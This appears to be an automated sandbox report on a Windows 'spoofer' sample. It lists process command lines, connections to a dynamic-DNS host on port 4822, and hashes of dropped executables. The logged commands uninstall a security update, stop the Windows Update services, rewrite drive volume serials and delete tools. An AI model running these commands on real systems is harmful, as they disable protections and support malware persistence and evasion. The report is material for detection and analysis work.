C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe h: GUR0-L6DS
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe h: GUR0-L6DS
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe i: PUNJ-UHFT
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe i: PUNJ-UHFT
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe j: 7SDK-KUEJ
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe j: 7SDK-KUEJ
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe k: J1BH-5TLS
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe k: J1BH-5TLS
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe l: 235T-JTN7
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe l: 235T-JTN7
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe m: OPZ6-MZBF
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe m: OPZ6-MZBF
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe n: DV5I-ROZJ
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe n: DV5I-ROZJ
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe o: NNJF-CMN4
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe o: NNJF-CMN4
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe p: OCUC-KZVZ
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe p: OCUC-KZVZ
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe r: NSA9-6HM9
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe r: NSA9-6HM9
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe s: 918R-4V3S
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe s: 918R-4V3S
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe t: ZRN4-55KG
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe t: ZRN4-55KG
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe u: V5HL-KL9P
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe u: V5HL-KL9P
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe v: RH47-V8OZ
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe v: RH47-V8OZ
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe y: 4R5U-U172
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe y: 4R5U-U172
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\amide.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\Disk.bat
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\amifldrv64.sys
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe z: G3P0-IOJG
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.chm
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.cfg
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe z: G3P0-IOJG
Network
| Country | Destination | Domain | Proto |
| NL | 52.142.223.178:80 | tcp | |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 146.78.124.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 180.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 173.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.136.104.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | brofisthej.ddns.net | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| SE | 2.70.186.204:4822 | brofisthej.ddns.net | tcp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| SE | 2.70.186.204:4822 | brofisthej.ddns.net | tcp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| SE | 2.70.186.204:4822 | brofisthej.ddns.net | tcp |
| SE | 2.70.186.204:4822 | brofisthej.ddns.net | tcp |
| US | 8.8.8.8:53 | 4.173.189.20.in-addr.arpa | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 79.121.231.20.in-addr.arpa | udp |
| SE | 2.70.186.204:4822 | brofisthej.ddns.net | tcp |
Files
memory/3808-0-0x0000000074D30000-0x00000000752E1000-memory.dmp
memory/3808-2-0x0000000001490000-0x00000000014A0000-memory.dmp
memory/3808-1-0x0000000074D30000-0x00000000752E1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\svchost.exe
| MD5 | 815925d78ef7ac6c94e4cf2faa78ee07 |
| SHA1 | 2d176a268dd3641f588e4c1df944fe66fd5983b0 |
| SHA256 | c3583477d1a45c53fedd36194a2a0e0fc8f1c7ace0768d4491690fcd7a4c8fd9 |
| SHA512 | fed59fc379f39a980df780eb9483f516d5e53b536b112a4a79b08b9d23bd9d3618b4e54af0517639903c87f21ac707642e82e960d9d1802cd6778174a0a990d3 |
C:\Users\Admin\AppData\Local\Temp\svchost.exe
| MD5 | 9cde38aaf3d60805c0746a8084b7ae7d |
| SHA1 | d3d0f009e1e9d8cc45bffd7668f0edc27ae1b7aa |
| SHA256 | 819a8a322ca5011499d338e34a9db88728a27e9c94481f011332947da981ca43 |
| SHA512 | 10e7b2239879b6d1d4a0ce9d8d02d791b236963aed9fc562be5b50f3987821ec0eafca1a3e5406f95e87539a0645fe5ea75a6102e13402691e69495bfd52a2fd |
C:\Users\Admin\AppData\Local\Temp\svchost.exe
| MD5 | bf78b8fbe5eb523a0cf1d923c12c1266 |
| SHA1 | b239217cf3157ee64bb9d94bdd2834a7e1614038 |
| SHA256 | b6218a46d3de1616be2546dea10cd883415e2cbc24b07ebc136a544cc4faa342 |
| SHA512 | b744e8ebaf51393a4febba4c6927c58765cbda82bc58c6bc6f5df5642637829b4edf2b457295c5ef06aac95eaa93da81e65527776f328363a4bfc6068b422d60 |
memory/3364-14-0x00000000005A0000-0x00000000008C4000-memory.dmp
memory/3364-15-0x00007FFAF2F80000-0x00007FFAF3A41000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\SPOOFER.exe
| MD5 | 01b2921f67e82717e0abbb42498d5856 |
| SHA1 | 18aa64c0f8d2450df4d7b7d9ecb6a29d32d0f6d1 |
| SHA256 | 27beba826eb9f6e14373551bc20315b3ba68b43611386a044f7e74bbcc197303 |
| SHA512 | 263cd26e2f815c5d5583b3ab9aa9d960c0bcf7adad88179270d77e9015494ca13d522b3fd86b0968f259a070fe1cc4382be185d37ab1eaaa4ccf5769c36f513c |
C:\Users\Admin\AppData\Local\Temp\SPOOFER.exe
| MD5 | a23b7d6af94d328c66266e80ffde263d |
| SHA1 | 3403190e349d6249a11ac2f55c3c7319da4ed380 |
| SHA256 | 9c46c4237c0da9109ea4f19154c61e4fa758c84a44ce6d11844b1bad4dad1031 |
| SHA512 | 0b37497e782f6034561d33bd37e7c329c6f8864bb74a87d4a39338e3ea9998504efdcd0a477ffbebfb3c2fe5c6c7326d789238115a3e80b3b94316d899ddfed8 |
C:\Users\Admin\AppData\Local\Temp\SPOOFER.exe
| MD5 | 665c3c9034430e79860a1025066e1951 |
| SHA1 | 39f10d1a98568d85c8db82ced606131054be8ac0 |
| SHA256 | 7315fd40e269b097c84b9e7f1656ffedc2613a3273f9db9e1374ad0fd8389b26 |
| SHA512 | 776c403721a6fb6d82ad0c5401d5fc015e7eae8210e13b4275ec4fe659a671403778d9b5738023bf3ce0647e9e2b552b23004595c7dba83dab9e64f43bd07492 |
memory/3808-28-0x0000000074D30000-0x00000000752E1000-memory.dmp
memory/4048-29-0x0000000000400000-0x0000000001274000-memory.dmp
memory/4048-30-0x000000007FA70000-0x000000007FE41000-memory.dmp
C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe
| MD5 | 7a9e379ea40a271dae648c68d0c6e3dd |
| SHA1 | b755513a137412dc9a4e7e65ca42177e7f1fcd2b |
| SHA256 | 901d0355059db13c4d6b62f26605ff875b375532f376e4a1f64de0930dc07fde |
| SHA512 | 2f29a838167a3fad7b71f2fd7918c19d904a82ae9c31103e9067ba99c3984d80a2056eeba2562c906eeeaf05a53012fb4cdff1e531cfbc4e8352045162cafea4 |
C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe
| MD5 | 218591eedb01fb0f7192a32e74f7e1b1 |
| SHA1 | 8ba7b69228268aeb83800a8cd9e14a2c20b9cf8f |
| SHA256 | eecb375861dda82516fa2a2f926d562351ac6221688c4b533875d73d5c056c39 |
| SHA512 | acec7407bd669eabd09ba9855e339f918a983589a496e4da7d77770467db309b2f2fab43f779202a039ccfe843aee9c2c8e3d9b020de0f02482f765ba975cd35 |
C:\Users\Admin\AppData\Roaming\conhost_sft.exe
| MD5 | abbd9852f77c70b8a41057f61a350bba |
| SHA1 | f12207e56ee0beed4b6a433d8adc8e0a20d9428a |
| SHA256 | 7a1e2c7c96e128caed9a4d08f54087a31cd195c79df09d890db06250f38f6625 |
| SHA512 | 9260214edb1bc5535facc7adc03e5939d8e73af11d7d48cc307dec66c3a9372af22c938745022a97fa54cc546e14a6fd4027dd3b66129c182448ee3f17a8831c |
C:\Users\Admin\AppData\Roaming\conhost_sft.exe
| MD5 | eccf1bf2971917048eaba0900f5ad129 |
| SHA1 | 236f44d189461051027d996df542724a0a5b1ae8 |
| SHA256 | da5738009c59eeef9462d6d0111ad7d25ecc1e3687333981af80d1b0bfb886f2 |
| SHA512 | 5961bd821c0eb5321149af19caf57f6d7e42b1e23072e4486ad7a6dde97476295d2c6ac106f63c8d123abdda5d6080e77a0c1c745021355bc0359a5c96e0706a |
C:\Users\Admin\AppData\Roaming\conhost_sft.exe
| MD5 | 53da02df6341cb4b2766643eb362f5ad |
| SHA1 | 019d9dbd34f956d5ef54c58bec5f3bd62e726a05 |
| SHA256 | 3326520a1304e2801798d87f31419dd7c409de3bbedd966eef4548f2ed29f5c9 |
| SHA512 | 0ee60dc42a03189a075c53aaab7aac57d4d195483f34d7e621022471d069f0d98713a068bf903757c7785a1ed877b0cbfe1951a20d497271e3c359ed4b20109c |
memory/4048-59-0x0000000000400000-0x0000000001274000-memory.dmp
C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe
| MD5 | e4b051ed276c3c493d078c6593c74ef3 |
| SHA1 | aba42b0ecceacfd3e60e4c741772a5913714bfad |
| SHA256 | b211b62abffc86ada3262e9fa6706b59159efd5a15391e15256747f3bf0a1309 |
| SHA512 | ce438c0d2ffb0d3e7b7a61a24bf26cfc928c008ba122d1d7298d68e19fea40ed2a8095fdbfd202b63852d0eb20788962a093da08329f9d16f137f3eeb66018a9 |
memory/1344-61-0x00007FFAF2F80000-0x00007FFAF3A41000-memory.dmp
memory/3492-64-0x0000000003020000-0x0000000003056000-memory.dmp
memory/3492-75-0x0000000073300000-0x0000000073AB0000-memory.dmp
memory/4048-76-0x000000007FA70000-0x000000007FE41000-memory.dmp
memory/1344-78-0x0000000002C40000-0x0000000002C50000-memory.dmp
memory/3492-80-0x0000000005330000-0x0000000005340000-memory.dmp
memory/3492-79-0x0000000005970000-0x0000000005F98000-memory.dmp
memory/3492-77-0x0000000005330000-0x0000000005340000-memory.dmp
memory/1344-49-0x0000000000B10000-0x0000000000BFA000-memory.dmp
C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe
| MD5 | beb422fc784d57e87ac97a619db769b0 |
| SHA1 | 8b9f2424922814916bf46f454bdf364ae4a9c740 |
| SHA256 | 59c0ebf323133cdac666460704e98c5de570a93cf7f5e209f0fc010b2d29e6a3 |
| SHA512 | 7e89f169343883588ed625fd322327792d5122e9a1c5753941a32091ccc9c7290a7bd3107887e1801d68f13caa2244fe5cad56fa0439f746a81090bd4a416993 |
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
| MD5 | a7dd4d24128c9d90d8eb83a0876e7b36 |
| SHA1 | 236a1fb3ee981e9584b15557be9f4ceaf48bac3c |
| SHA256 | 391c06c3c44f779ac778e0027defde601d23942f53d818930fc8fdbbccbb0bc0 |
| SHA512 | e7dd83f86e6dd739dc3db86e5aa1a15ff8f258ffe49aa454cbcdc392b148f1b56bd035c467d40c4fcfecd7db10839dd8f140b0f0d5bb8151dbec02703e07bc43 |
memory/3492-88-0x0000000005610000-0x0000000005632000-memory.dmp
memory/1344-90-0x00007FFB12840000-0x00007FFB12841000-memory.dmp
memory/3364-91-0x00007FFAF2F80000-0x00007FFAF3A41000-memory.dmp
memory/4352-93-0x000000001BC30000-0x000000001BC40000-memory.dmp
memory/1344-92-0x00007FFB12A00000-0x00007FFB12ABE000-memory.dmp
memory/4352-89-0x00007FFAF2F80000-0x00007FFAF3A41000-memory.dmp
memory/1344-87-0x00000000013B0000-0x00000000013BE000-memory.dmp
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
| MD5 | 85d58b07ad7993cb38bad54494d77974 |
| SHA1 | 504943edd8883a0ec18b2b5f7e6326ed1802b551 |
| SHA256 | 26ac87b2a1ee32b423712f9f3fccd314c46df7e89306e7b4f1a4e6120abc9c6c |
| SHA512 | ea4ed5f6ce1b78d5122e415441dff5862e14d4b07e1b3e5e1c79e931041c5124ebf3dde767670136616b8db76963fc85ac8d620da6e6715a545e9e0d697b40d5 |
C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe
| MD5 | 0a901a92f3e9eed828135c1aac8605ab |
| SHA1 | c27bb179c21d7a80537be5c9444a70102f7c2876 |
| SHA256 | f1f746d663568cb287b7a5efcab4d28cb773a08438e49fa1300cb4023646c5c8 |
| SHA512 | 5040904962cbe05d437344de4d2783862a4e01cb709d5b8604e095a20a505f68a72a735a51ee92a67da683a957ff01977985f0ac11b862624da20e5761464fcc |
C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe
| MD5 | cbd73512d443b428ca0a6743cc8a5b9e |
| SHA1 | feae4326bb1ce20f2e1c4e238e454547a520f54b |
| SHA256 | e4e7f6bad937bd629d2d9d0edc661363f675772473c6c000c306acbfb8369f35 |
| SHA512 | 856ce013bbb68191813fb382068ba9079797f0e29e7535d2b667ec66ee0ca06f9ef89539f98d2ada153ea225b04da3eb72499cbc3a80d66f34b4b17224326736 |
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
| MD5 | 17410b8a611ab87ffe37d21b821c6d2f |
| SHA1 | 456f53c09878bc0b893e92212e4ae8d918502478 |
| SHA256 | 779ee0e6129d8d5823919b1509188a1d89cebd79d60ae35e6d39bf04c2c7eeed |
| SHA512 | fdbf194440739de3aa6336c729ed7a75e04b949814625956af6f3a5008b30c1edf03b9a817dadb7bb7bfe87be756bf53ef40204d182abbe2e4705e4fe4df155b |
memory/1344-97-0x00007FFB12830000-0x00007FFB12831000-memory.dmp
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
| MD5 | f514296b4ae8658aa34576473293f947 |
| SHA1 | cf894fb41bd64d043552e72a5d9f0c1a2dac2c9b |
| SHA256 | f810eae1e4b18803a4cf4940e4054c06cbba9c5b84317cd645a02cb473965324 |
| SHA512 | 826e42da6605ef81deac8deb8839fb38ec8e4c0ffee424f4ec8d7255273fe7df69fa5c522b3ef9b77473b596cce22d569713ae0d785c06f496c1c1f3911a52ac |
memory/1344-99-0x00000000013E0000-0x00000000013FC000-memory.dmp
C:\ProgramData\Microsoft\Windows\Disk.bat
| MD5 | 250e75ba9aac6e2e9349bdebc5ef104e |
| SHA1 | 7efdaef5ec1752e7e29d8cc4641615d14ac1855f |
| SHA256 | 7d50c4fdcf6d8716c7d0d39517d479b3eeee02d2020ed635327405ae49c42516 |
| SHA512 | 7f0d7d41c9eafcd65daa674b5182cf52e11aa0f6d6baaee74fe4c4ffc08a163277c4981cd123af0cb1857ae6fd223b5e8c676d9dc5c646a870fbd9bc4001c438 |
memory/1344-101-0x00007FFAF2F80000-0x00007FFAF3A41000-memory.dmp
C:\ProgramData\Microsoft\Windows\DevManView.exe
| MD5 | fa463ecfba90fa4fd7dec76702fa161f |
| SHA1 | f142c0781c7a37ffca41c6f627b36e6e8a2feb65 |
| SHA256 | fec00f68baef96dedef37f425f810c1531c3bdba4ffd7208dd0ce3161708faa9 |
| SHA512 | 6535fcaa1cd333f196f01a2e5bfdfcd8fa5a7b478f7489f7fff0cb8af6f8f136506a366b47e07239a3abf85f67136094373ab705def1aa51fba3e86622145a76 |
C:\ProgramData\Microsoft\Windows\DevManView.exe
| MD5 | 032136bc66107952082c03d0dc0d5c88 |
| SHA1 | f40b7fe946e2b3ec4193779f383525849d22e091 |
| SHA256 | e65408201851a911634fda17e103239bb7a0df82f3ba24c671146f5c3852da10 |
| SHA512 | 4d9953f4112c96a596b614a650644ad105ae9fcc27e3481c549bdddeba5b3142db67f730e6746e1b4af40ebd7c69b35181bbf67d876ddd61d31cc2685bd14c1c |
C:\ProgramData\Microsoft\Windows\DevManView.exe
| MD5 | 42c7df4996f5151c91e1e2000094b3f6 |
| SHA1 | e3a79a63d5ae4ba0977e037d14d0c890efd04622 |
| SHA256 | 376558ef35e6a4d45b4edaa6e3191c9294808350a41305e18abd26ad0a7c56b1 |
| SHA512 | 11ddb517c333df5761924dc56789ef4c6074817c8ad762c1604218d6bb0c9324070ff87a6fea99fe1456b1d87c583a3c880bdf4ae660889ffc1fae1ea7b903b2 |
C:\ProgramData\Microsoft\Windows\DevManView.exe
| MD5 | d35629a66bb3606e144d74d0e8e00352 |
| SHA1 | 2ef6626f7418bf362c76950f59c69d700c4dbfe9 |
| SHA256 | 4d651958e70d1779c4351398439500b76ad669f5a06d35147c6772c855d4cc58 |
| SHA512 | 26a7ba64374363fde40976ac97620e8ed48aa571819b3d67ce8859bddb4aab76715046db6255e1678be6f85d7b55d70ce41db992d6438c922718fae14eff47c5 |
C:\ProgramData\Microsoft\Windows\DevManView.exe
| MD5 | fa67afb14a0e45f2f307460b45a50386 |
| SHA1 | 8ef9c47c9430a59f3bce2549dfad4648ed95bcdc |
| SHA256 | a83590bbc879374da15b129243e26355c693fa1401884715d0678129cf18a7a3 |
| SHA512 | 9708bb9e037cb8529ede6df0257628b632c155162f453ce2e58fa00aadeca244e76ce57efc6a1d353489823b73676d5d5aed02da93632d5d835e7184151c6d40 |
C:\ProgramData\Microsoft\Windows\DevManView.exe
| MD5 | 367c82fa6051395c4bb74af32f130181 |
| SHA1 | 0e3e914a0622b548d103c7228240996289ba8dfc |
| SHA256 | b956cee83693df5ed7ea30ba7ce55b767398f3718bf794b6cb35f026c5a80363 |
| SHA512 | 9f3a2119a4388ff9f1565ce0b733d6f59d39a9efa15f1eb20f28bbd7a13ca3faf929ee82a5072ba89f8b9a475c17daa90400e0bc857a779515d7e9b527e74c9b |
C:\ProgramData\Microsoft\Windows\DevManView.exe
| MD5 | 8f4f0da9af7676ff7609d694e61db29a |
| SHA1 | 901c6543af634b0ae940874a722b5c3f54187a02 |
| SHA256 | 0f1b1cf52dc0b83edb5aa7dec54f627ae16f1cb0ad8efa2fa60309e82dedafad |
| SHA512 | 9aadc8ed13845df6bb56ead69f5b42900f58b02fbd63f7bf36e1f5a9229970de11043bcee18307e9cb7fa06b21d53759e6de5ac0f5f6880d288153f7f8e89c50 |
C:\ProgramData\Microsoft\Windows\DevManView.exe
| MD5 | 04aaa2c5c387058d6ba1c19a457c6d9b |
| SHA1 | 6a18d5ea3cd820a5e1bdfc6d5930ef4cd2c42cd5 |
| SHA256 | 17c3c020c37f12c738a86e417db53ef00f33e7b8fda51c82c429a402376e4d10 |
| SHA512 | 3bfb81851b74c3e609fc19e5fc51570fb7ff42e49808aa279d257d34dfbfe2e5dcff6e87e97d9766c9620f9cd851626dcdee4c1067484f3a31d56dc409a004d3 |
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
| MD5 | 76b7ccbab3c080459eccb797006e0677 |
| SHA1 | 641f524d6f06b8cb880c6bc17e062cb4849ab80c |
| SHA256 | 0a7304b59a5a0dc342acf61bab72db77930ab6081558b1ad053cc569d3e46387 |
| SHA512 | a8757758f9a078af27641f7aa45599421d7080a05b801ca51ce29bea3838649bb94c51262a0c61f929220e84b4206bb1f793bd3052adbf7132c7aec03a3a622e |
memory/3492-126-0x0000000073300000-0x0000000073AB0000-memory.dmp
memory/5032-128-0x000001B04BDC0000-0x000001B04BDE2000-memory.dmp
memory/5032-130-0x000001B04BE70000-0x000001B04BE80000-memory.dmp
memory/5032-129-0x000001B04BE70000-0x000001B04BE80000-memory.dmp
memory/5032-127-0x00007FFAF2F80000-0x00007FFAF3A41000-memory.dmp
C:\ProgramData\Microsoft\Windows\DevManView.exe
| MD5 | 3cca77615598753a26e7f63001cf3451 |
| SHA1 | df57ddedd57d95d8ad57e521008ef6ccfc2e2280 |
| SHA256 | a7d1244a8f8a441b6638acf6c6b04c7e9445b74588835bc96bbbe33602302ceb |
| SHA512 | 5b7edd9734bd175cba5232d23f92d5d691b0feda53fe3dcf8894e25177fc5d2fcdba9ae99520c0516fc09422c046287ed0fb1b9967d6650be8d7206c194c0aac |
C:\ProgramData\Microsoft\Windows\DevManView.exe
| MD5 | fa636ca84f425c6efaab8bd89cef87a1 |
| SHA1 | d9a1b4b65de782c8a73dd8b0a344052e5c57850d |
| SHA256 | 0d6dcb87a1e835fab9455abcaf37541765508cfb145b8fd64f9d0d51ce446e64 |
| SHA512 | 2a97d58a52494f6cfb95fae4c9933e22159cacf6c123d564cef05b62f5a7fa7874b019b71a34557152f4b04e3d7a1f070bef1aaf96a26e2bb0e9b008a5ca9861 |
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
| MD5 | de22ab09728872340c1aae9e2c2f7cbd |
| SHA1 | 1312d4ec91c21abc702d0b224f3947f883026bed |
| SHA256 | 0707dd60c3423cf8df8f8b30644f276d11aa40e65411785f9e4e11f7f172583b |
| SHA512 | 26e9f1f379c3ae4ef386c53fad4a4d084471162886c4c87c15958c8b431fdba16502fb1cf5d92f9592bc508ee33a1eab78735c828bd22d50b6276ea7b729e1ab |
C:\ProgramData\Microsoft\Windows\DevManView.exe
| MD5 | 6e279ccf087ed3b7320e9e65b95e1a1d |
| SHA1 | fc88f27f832db412198960bccf8edfcf3ac705b6 |
| SHA256 | a02662a8638c7385026f8b026330a184f05cefad2071d0f2223361cf9fb9b1b0 |
| SHA512 | b49b592560f1be42cf650ed2db0be6d1e0053e84085ba86a36980f843b7b80ff59d0fd1ce127c712500e5d49bcf2bfd644bdc99a5df01d6e07f63aced5f77789 |
C:\ProgramData\Microsoft\Windows\DevManView.exe
| MD5 | 3681bd0931946958c012ab82732347f3 |
| SHA1 | 2fa2680bf3f328e6723decf940519cfcfc539e67 |
| SHA256 | 1617376409421affd1ef09e34d403e62b1ea9bceb0d2d665eeb1d516063422e6 |
| SHA512 | 6c3a003dd9ae97227d2353004ee55979cd511db20d9740d2f4b0976cf510bba10d7136d2dfa55475ee76e49fc674c14fc0333d90d2a7698c3747eda49f886a0f |
C:\ProgramData\Microsoft\Windows\DevManView.exe
| MD5 | 6b406843de9effc0e7e17996e6f1d912 |
| SHA1 | 75f39b70d5f739116122ce9c050ae7d57539a61e |
| SHA256 | d6b76e5501085ead758079b7f9368a82d6783841e88f41c85aab61db83232c6a |
| SHA512 | 963e4e6f1bc00f94b448bb3e7496e925050b7c38a63364cfd80387732c03a0599a0fbe9ff48f55ee1feabc995b5ffc712a0f00bf9c6ad5d17482eeabc54edb06 |
C:\ProgramData\Microsoft\Windows\DevManView.exe
| MD5 | 9009d1e4684d1c75de93b55c9c5375b2 |
| SHA1 | 01d5562fdb1cbd8197dbd2be915c2db922b1d3bf |
| SHA256 | 44748a176f1df893e19bb86220a2c6bec5db70022e72959774940f409bff702a |
| SHA512 | 995f55326b641726a1ec13f93fdde135b0642a0e4cbec17e4324adba9f421e5dae1a87b9f8fa23cba21ad301d9370a219865d7d41900afd1f7a2d7e95294462c |
C:\ProgramData\Microsoft\Windows\DevManView.exe
| MD5 | 7ce4032a767e9c0b18f46004b4313537 |
| SHA1 | ac02fcf705641689ad8db5e1d073e2aa9efe67c4 |
| SHA256 | bf3736d19771ce687c67995ebb075091b0f5e49f9f39dab2052b35ecad229c3a |
| SHA512 | 42e09ea1ddf8d36fcd302afcda79ab8cdcd60f2a5cff6e6cf57c54f3f8cc81ff33c1aef8ebb3e95ca0b075054975e051fa9fcda52e7c31275e22df0b2ad7e2e4 |
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
| MD5 | ccd56ad4e0ca82222c737e559a81233f |
| SHA1 | 15ac8ddc4a8d0c369e09224b811caad75c20546d |
| SHA256 | 6180cf7e283997df6605ecdf5fbfd91d05ab68268ee23fd99e17ec74a45fbfb1 |
| SHA512 | ec1088fcdc6ebec1fa2165306dc22b7929c5d3489dee9ded2660623ac89c808faefd811a2fc62e39d7a755b05b5b9c302d96a50941dca5e64c8fbe09f482668a |
C:\ProgramData\Microsoft\Windows\DevManView.cfg
| MD5 | 43b37d0f48bad1537a4de59ffda50ffe |
| SHA1 | 48ca09a0ed8533bf462a56c43b8db6e7b6c6ffa8 |
| SHA256 | fc258dfb3e49be04041ac24540ef544192c2e57300186f777f301d586f900288 |
| SHA512 | cfb1d98328aed36d2fe9df008a95c489192f01d4bb20de329e69e0386129aff4634e6fd63a8d49e14fc96da75c9b5ed3a218425846907d0122267d50fc8d7a82 |
C:\ProgramData\Microsoft\Windows\DevManView.exe
| MD5 | 560d1331bf42529692a09022928ddbc1 |
| SHA1 | c4b91d0927b1c0f10d6856e269f0a5a40de337c8 |
| SHA256 | 8a8e2bccbe13e8f4aa6e1711bc8c82a4435274e94cbb372a20f6dbc89d870f2c |
| SHA512 | b24b340b8887e71b1cfd74ce00ea5fa6774319f0dd2210df327b87078a2124fbad1a15eeb169c954a07718e20810a548d4014503324815bb40b3252e48599d62 |
C:\ProgramData\Microsoft\Windows\amifldrv64.sys
| MD5 | 785045f8b25cd2e937ddc6b09debe01a |
| SHA1 | 029c678674f482ababe8bbfdb93152392457109d |
